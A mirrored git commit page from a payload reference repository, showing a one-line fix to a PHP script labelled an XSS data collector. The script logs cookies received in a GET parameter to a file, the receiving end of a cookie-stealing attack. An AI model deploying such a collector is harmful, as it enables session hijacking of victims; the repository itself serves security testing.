mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Fix PHP XSS data collector line breaks
This commit is contained in:
parent
83fbdb906b
commit
2f40961990
1 changed files with 22 additions and 22 deletions
|
@ -82,7 +82,7 @@ Write the collected data into a file.
|
|||
<?php
|
||||
$cookie = $_GET['c'];
|
||||
$fp = fopen('cookies.txt', 'a+');
|
||||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
||||
fwrite($fp, 'Cookie:' .$cookie."\r\n");
|
||||
fclose($fp);
|
||||
?>
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue